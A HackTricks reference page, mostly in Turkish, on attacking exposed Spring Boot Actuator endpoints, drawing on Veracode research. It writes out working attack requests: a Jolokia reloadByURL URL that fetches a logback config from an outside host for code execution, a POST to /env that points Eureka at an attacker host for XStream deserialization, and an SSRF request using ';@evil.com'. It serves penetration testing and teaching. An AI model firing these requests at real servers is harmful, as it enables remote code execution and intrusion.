Spring Actuators
Reading time: 3 minutes
tip
AWS Hacking'i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking'i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)
HackTricks'i Destekleyin
- abonelik planlarını kontrol edin!
- Bize katılın 💬 Discord grubuna veya telegram grubuna veya bizi takip edin Twitter'da 🐦 @hacktricks_live.
- Hacking ipuçlarını paylaşın, HackTricks ve HackTricks Cloud github reposuna PR göndererek.
Spring Auth Bypass
From https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png****
Exploiting Spring Boot Actuators
Check the original post from [https://www.veracode.com/blog/research/exploiting-spring-boot-actuators]
Key Points:
- Spring Boot Actuators,
/health
,/trace
,/beans
,/env
gibi uç noktaları kaydeder. 1 ile 1.4 sürümleri arasında, bu uç noktalar kimlik doğrulama olmadan erişilebilir. 1.5 sürümünden itibaren yalnızca/health
ve/info
varsayılan olarak hassas değildir, ancak geliştiriciler genellikle bu güvenliği devre dışı bırakır. - Belirli Actuator uç noktaları hassas verileri açığa çıkarabilir veya zararlı eylemlere izin verebilir:
/dump
,/trace
,/logfile
,/shutdown
,/mappings
,/env
,/actuator/env
,/restart
, ve/heapdump
.- Spring Boot 1.x'te, aktüatörler kök URL altında kaydedilirken, 2.x'te
/actuator/
temel yolu altındadır.
Exploitation Techniques:
- Remote Code Execution via '/jolokia':
/jolokia
aktüatör uç noktası, MBean'lere HTTP erişimi sağlayan Jolokia Kütüphanesini açığa çıkarır.reloadByURL
eylemi, dış bir URL'den günlük yapılandırmalarını yeniden yüklemek için istismar edilebilir; bu, kör XXE veya hazırlanmış XML yapılandırmaları aracılığıyla Uzaktan Kod Yürütme ile sonuçlanabilir.- Örnek istismar URL'si:
http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/artsploit.com!/logback.xml
.
- Config Modification via '/env':
- Spring Cloud Kütüphaneleri mevcutsa,
/env
uç noktası çevresel özelliklerin değiştirilmesine izin verir. - Özellikler, Eureka serviceURL'deki XStream deserialization açığını istismar etmek gibi zayıflıkları istismar etmek için manipüle edilebilir.
- Örnek istismar POST isteği:
POST /env HTTP/1.1
Host: 127.0.0.1:8090
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
eureka.client.serviceUrl.defaultZone=http://artsploit.com/n/xstream
- Other Useful Settings:
spring.datasource.tomcat.validationQuery
,spring.datasource.tomcat.url
, vespring.datasource.tomcat.max-active
gibi özellikler, SQL enjeksiyonu veya veritabanı bağlantı dizelerini değiştirmek gibi çeşitli istismarlar için manipüle edilebilir.
Additional Information:
- Varsayılan aktüatörlerin kapsamlı bir listesi burada bulunabilir.
- Spring Boot 2.x'teki
/env
uç noktası, özellik değişikliği için JSON formatını kullanır, ancak genel kavram aynı kalır.
Related Topics:
- Env + H2 RCE:
/env
uç noktası ve H2 veritabanının kombinasyonunu istismar etme detayları burada bulunabilir.
- SSRF on Spring Boot Through Incorrect Pathname Interpretation:
- Spring çerçevesinin HTTP yol adlarındaki matris parametrelerini (
;
) ele alması, Sunucu Tarafı İstek Sahteciliği (SSRF) için istismar edilebilir. - Örnek istismar isteği:
http
GET ;@evil.com/url HTTP/1.1
Host: target.com
Connection: close
tip
AWS Hacking'i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking'i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)
HackTricks'i Destekleyin
- abonelik planlarını kontrol edin!
- Bize katılın 💬 Discord grubuna veya telegram grubuna veya bizi takip edin Twitter'da 🐦 @hacktricks_live.
- Hacking ipuçlarını paylaşın, HackTricks ve HackTricks Cloud github reposuna PR göndererek.